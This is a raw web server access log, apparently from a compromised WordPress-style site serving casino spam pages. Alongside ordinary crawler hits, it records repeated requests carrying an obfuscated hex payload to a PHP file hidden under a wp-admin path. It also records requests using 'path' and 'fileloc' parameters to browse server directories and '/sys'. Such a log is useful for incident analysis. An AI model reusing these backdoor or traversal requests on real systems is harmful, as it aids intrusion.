65.254.81.60 - - [30/Oct/2025:18:16:25 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313038352p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373438352q6339656164303062626266383932353562633732326461613062646231666233222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:21:32 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/driver HTTP/1.1" 200 22877 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.133 - - [30/Oct/2025:18:21:37 +0545] "GET /64655916?entity=0064575176 HTTP/1.1" 200 201593 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.131 - - [30/Oct/2025:18:21:39 +0545] "GET /2025/08/28/netxbet-casino-review-and-free-chips-bonus/ HTTP/1.1" 200 204948 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.173 - - [30/Oct/2025:18:21:42 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/net HTTP/1.1" 200 15752 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:16:47 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313130372p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373530372q3962613364663730323330633137663232363433616439383233373962633637222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:21:52 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/virtio1 HTTP/1.1" 200 31742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:22:01 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/subsystem/lo/statistics HTTP/1.1" 200 54901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:17:09 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313132392p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373532392q6161373538616635303565393737336437363464386437346237386234306561222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:22:11 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/module HTTP/1.1" 200 37077 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.133 - - [30/Oct/2025:18:22:13 +0545] "GET /47476364?entity=0047417288 HTTP/1.1" 200 198803 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.173 - - [30/Oct/2025:18:22:21 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_net/module HTTP/1.1" 200 37077 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:22:30 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_balloon/virtio2 HTTP/1.1" 200 30250 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:17:31 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313135312p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373535312q3961356430633963653761623039393964366361333835646437393162386362222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:22:43 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/net/eth0 HTTP/1.1" 200 83250 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
45.86.200.86 - - [30/Oct/2025:18:22:45 +0545] "GET /maps/xtip-stockach/ HTTP/1.1" 200 73443 "https://dubai91.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71"
45.86.200.112 - - [30/Oct/2025:18:22:48 +0545] "GET /maps/xtip-stockach/?fileloc=/home/roshanchandy/public_html/dubai91.com/googlef9f69319b2100c7b.html&path=/home/roshanchandy/public_html/dubai91.com HTTP/1.1" 200 12549 "https://dubai91.com/maps/xtip-stockach/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71"
65.254.81.60 - - [30/Oct/2025:18:17:54 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313137342p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373537342q3732636531323262376138353462383136363438643837633639376236653030222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:22:55 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/module/notes HTTP/1.1" 200 16215 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:23:05 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/power HTTP/1.1" 200 23423 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:23:15 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block HTTP/1.1" 200 15758 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:18:16 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313139362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373539362q6632356264363931663363396531323333333065376433633465353839353930222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
66.249.79.131 - - [30/Oct/2025:18:23:13 +0545] "GET /?146115819?entity=0145932354 HTTP/1.1" 200 200407 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.173 - - [30/Oct/2025:18:23:24 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio2/subsystem/drivers HTTP/1.1" 200 21034 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:23:34 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/virtio1/driver HTTP/1.1" 200 23242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:18:38 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313231382p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373631382q3136353665373836336132623631326239393137386430643235626634393261222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
66.249.79.132 - - [30/Oct/2025:18:23:42 +0545] "GET /1623594281?entity=1621547666 HTTP/1.1" 200 218186 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.173 - - [30/Oct/2025:18:23:45 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_net/module/sections HTTP/1.1" 200 59787 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:23:59 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_net/virtio0/driver HTTP/1.1" 200 23242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:19:00 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313234302p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373634302q3536643036363036326337646636356265386666363737616264656238336133222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:24:08 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/virtio1/subsystem HTTP/1.1" 200 23378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:24:19 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_net/virtio0/net HTTP/1.1" 200 15952 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:19:22 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313236322p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373636322q3032643335653130356461626238333939303133373138396135636434643834222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:24:27 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_balloon/virtio2/driver HTTP/1.1" 200 23330 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:24:40 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/net/eth0/subsystem HTTP/1.1" 200 17750 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:19:44 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313238342p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373638342q3130376536616235323263313265616239333439323966343766646462363935222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:24:50 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/module/drivers HTTP/1.1" 200 16018 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.131 - - [30/Oct/2025:18:24:54 +0545] "GET /?115186159?entity=0115041698 HTTP/1.1" 200 202092 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.131 - - [30/Oct/2025:18:24:55 +0545] "GET /113031608?entity=0112889864 HTTP/1.1" 200 206162 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.173 - - [30/Oct/2025:18:24:59 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_net/module/notes HTTP/1.1" 200 16215 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:20:06 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313330362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373730362q3533646637323337323735323137353765663666326234623730313965343236222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:25:08 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_net/virtio0/net/eth0 HTTP/1.1" 200 85045 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:25:22 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/net/eth0/queues HTTP/1.1" 200 17734 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:20:28 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313332382p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373732382q3437663737323661303035346432646332616364373563386536383933396236222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:25:32 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/module/sections HTTP/1.1" 200 50313 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.131 - - [30/Oct/2025:18:25:32 +0545] "GET /2025/08/28/split-aces-casino-review-and-free-chips-bonus/ HTTP/1.1" 200 204978 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.173 - - [30/Oct/2025:18:25:44 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_balloon/virtio2/power HTTP/1.1" 200 23906 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:20:50 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313335302p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373735302q6235653534316538356131666232363966396639306438393062383230656566222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:25:53 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_net/module/holders HTTP/1.1" 200 14313 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:26:03 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_net/module/drivers HTTP/1.1" 200 16018 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.55.39.225 - - [30/Oct/2025:18:26:06 +0545] "GET /robots.txt HTTP/1.1" 200 76 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
65.254.81.60 - - [30/Oct/2025:18:21:12 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313337322p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373737322q6166366531316139626161653630343137323861653038376663353333613738222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:26:12 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/module/holders HTTP/1.1" 200 14313 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.133 - - [30/Oct/2025:18:26:17 +0545] "GET /82086355?entity=0081983634 HTTP/1.1" 200 202519 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.173 - - [30/Oct/2025:18:26:27 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/net/eth0/power HTTP/1.1" 200 23896 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:21:34 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313339342p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373739342q3364306235313837393737363131626230303031393961313761373630613136222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
66.249.79.131 - - [30/Oct/2025:18:26:32 +0545] "GET /131189957?entity=0131025314 HTTP/1.1" 200 197984 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.173 - - [30/Oct/2025:18:26:39 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/net/eth0/subsystem/lo HTTP/1.1" 200 83804 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.131 - - [30/Oct/2025:18:26:45 +0545] "GET /?1623851725?entity=1621804786 HTTP/1.1" 200 205883 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.173 - - [30/Oct/2025:18:26:50 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_net/virtio0/power HTTP/1.1" 200 23810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:21:56 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313431362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373831362q3866333233623431313064316631643866646135613864343465623864306539222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:27:00 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/subsystem HTTP/1.1" 200 23013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:27:09 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/virtio1/block HTTP/1.1" 200 15958 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:22:18 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313433382p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373833382q3036616663346662633731323637613230353461663964653730653934333339222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:27:22 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/net/eth0/queues/tx-0 HTTP/1.1" 200 25757 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.133 - - [30/Oct/2025:18:27:22 +0545] "GET /2081263904?entity=2078640152 HTTP/1.1" 200 201541 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.173 - - [30/Oct/2025:18:27:34 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/net/eth0/statistics HTTP/1.1" 200 59960 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:22:44 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313436342p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373836342q3136373564363034396232313733633634396261393863653362633439356438222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
